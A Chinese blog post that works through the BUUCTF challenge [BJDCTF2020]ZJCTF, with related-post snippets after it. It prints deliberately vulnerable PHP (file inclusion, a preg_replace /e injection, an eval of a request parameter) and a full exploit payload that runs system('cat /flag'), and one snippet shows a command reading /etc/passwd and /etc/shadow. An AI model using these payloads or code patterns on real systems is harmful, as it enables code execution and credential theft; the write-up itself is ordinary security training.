第四十题——[BJDCTF2020]ZJCTF,不过如此

最新推荐文章于 2022-08-12 20:19:42 发布
最新推荐文章于 2022-08-12 20:19:42 发布
阅读量173 收藏
点赞数
分类专栏: CTF-WEB 文章标签: PHP 源码审计 漏洞利用 代码注入 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37589805/article/details/116093618
版权
题目地址:https://buuoj.cn/challenges

解题思路

第一步:进入题目,看到源码,发现需要传入参数text以及file

<?php

error_reporting(0);
$text = $_GET["text"];
$file = $_GET["file"];
if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>";
    if(preg_match("/flag/",$file)){
        die("Not now!");
    }

    include($file);  //next.php
    
}
else{
    highlight_file(__FILE__);
}
?>

第二步:使用data://text/plain绕过对text的检测,使用php://filter/read=convert.base64-encode/resource查看提示的next.php的源码,出来一串base64的密文,解密得next.php的源码

<?php
$id = $_GET['id'];
$_SESSION['id'] = $id;

function complex($re, $str) {
    return preg_replace(
        '/(' . $re . ')/ei',
        'strtolower("\\1")',
        $str
    );
}


foreach($_GET as $re => $str) {
    echo complex($re, $str). "\n";
}

function getFlag(){
	@eval($_GET['cmd']);
}

第三步:利用漏洞,构造参数\S*=${getFlag()}执行next.php给出的getFlag函数,在传入cmd=system(‘cat /flag’);让getFlag()函数执行cat命令获取参数,最终payload:?text=data://text/plain;base64,SSBoYXZlIGEgZHJlYW0=&file=next.php&\S*=${getFlag()}&cmd=system('cat \flag');

在这里插入图片描述

想学习安全的小白
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
B: 寻找 2020——2020.txt
10-17
第十一届蓝桥杯大赛软件类省赛第二场 Java 大学 B 组 第十一届蓝桥杯大赛软件类省赛第二场 Java 大学 B 组 第十一届蓝桥杯大赛软件类省赛第二场 Java 大学 B 组 试 B: 寻找 2020——2020.txt 2020.txt 2020.txt
2020 MCM Problem C Translation,2020美赛C——详细版翻译
12-14
文章目录2020 MCM Problem C 详细翻译Requirements 要求Glossary 词汇表Attachments 附件:问数据集 2020 MCM Problem C 详细翻译 2020 MCM Weekend 2 Problem C: A Wealth of Data 2020年MCM周末2问C:数据的...
文件包含、文件上传漏洞
CyhDl666的博客
01-28 1650
文章目录文件包含漏洞1.[HCTF 2018]WarmUp2.[ACTF2020 新生赛]Include3.[极客大挑战 2019]Secret File4.[BJDCTF2020]ZJCTF 不过如此 文件包含漏洞 不多说了 直接做 1.[HCTF 2018]WarmUp F12进入source.php文件 <?php highlight_file(__FILE__); class emmm { public static function che
buuctf-不过如此
bin789456的博客
02-02 2039
WP 这个利用了preg的命令执行,没怎么遇到过,记录一下。 首先代码审计: <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."&
BUU刷记7
最新发布
Kanyun的博客
08-12 164
以GET方法传递参数值给变量host,通过了两个函数过滤之后,使用system系统命令执行nmap两个函数一起使用时 对参数的处理会造成单引号'逃逸nmap有一个参数-oG可以实现将命令和结果写到文件。
BUU-ZJCTF-不过如此
unexpectedthing的博客
10-08 199
文章目录wp其他知识点 wp 打开环境,还是代码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></b
[BJDCTF2020]ZJCTF不过如此
05-07 359
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_mat.
2020年全国中考试——标点符号——汇编及答案.pdf
10-03
2020年全国中考试——标点符号——汇编及答案.pdf
软件编程等级考试真Scratch二级——2020年第四季度模拟附答案
03-28
软件编程等级考试真 Scratch 二级——2020 年第四季度模拟附答案 本资源主要针对软件编程等级考试 Scratch 二级考试,提供了 2020 年第四季度模拟附答案。该资源涵盖了 Scratch 编程的多个方面,包括角色坐标...
西华高数(2012——2020)真含答案.zip
05-31
西华专升本考试2012——2020高数真考试合集(含答案
BUU WEB记录1(持续更新)
Sapphire037的博客
05-19 1111
php简单代码审计
xianyu9w的博客
04-18 566
目来源 bugku 目: <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> eval能够执行php代码 $_REQUEST: 能获取get/post提交的数据 eval: 把字符串按照 PHP 代码来计算,该字符串必须是合法的 PHP 代码,且必须以分号结尾。 个人猜测应该类似于sql注入 先.
命令执行专总结突破
goddemon
12-02 1737
一.eval执行与命令执行 常见的命令状况 eval–>可计算某个字符串,并执行其中的的 JavaScript 代码 典型构造是执行代码 1.利用system执行的典型方法 eval $cmd #即构造 cmd=system("ls"); #即列出这个文件的相关内容 system(“ls -al /etc/passwd /etc/shadow”); cmd=system("cat flag_1171"); #骚思路 #绕过 c=system('cat f*'); #-->即代通配符方法读取思路
BUUCTF WEB ZJCTF,不过如此1
qq_41696858的博客
12-11 566
上来就给源码,很直接 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; i
CTF刷
qq_45655136的博客
08-05 6339
网站:bugku;BUUCTF 本文记录了在刷过程中所学到的知识点 坚持每天刷5道,持续更新 坚持就是胜利鸭 CTF 1、bugku–Simple_SSLI_1 根据目SSLI即服务端模板注入攻击,服务段接收用户输入,将其作为web应用模板的一部分,渲染编译后执行恶意内容,导致敏感信息泄露、代码执行等。 直接F12,发现提示in the flask,set a secret_key flask模板,config是flask模板中的一个全局对象,包含了所有应用程序的配置值。 然后在url输入/?fl
审计练习12——[BJDCTF2020]ZJCTF不过如此
qq_43756333的博客
06-04 524
平台:buuoj.cn 打开靶机得源码 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br&gt
BUUCTF web(六)
m0_46616663的博客
11-25 2812
[BJDCTF2020]ZJCTF不过如此 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br
[BJDCTF2020]ZJCTF不过如此(preg_replace的/e漏洞,PHP的特性)
qq_44657899的博客
05-16 1154
<?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_matc
浙江省大学生网络与信息安全竞赛-决赛-2019-Web-逆转思维(php几个协议的运用)
weixin_45844670的博客
09-23 1406
<?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值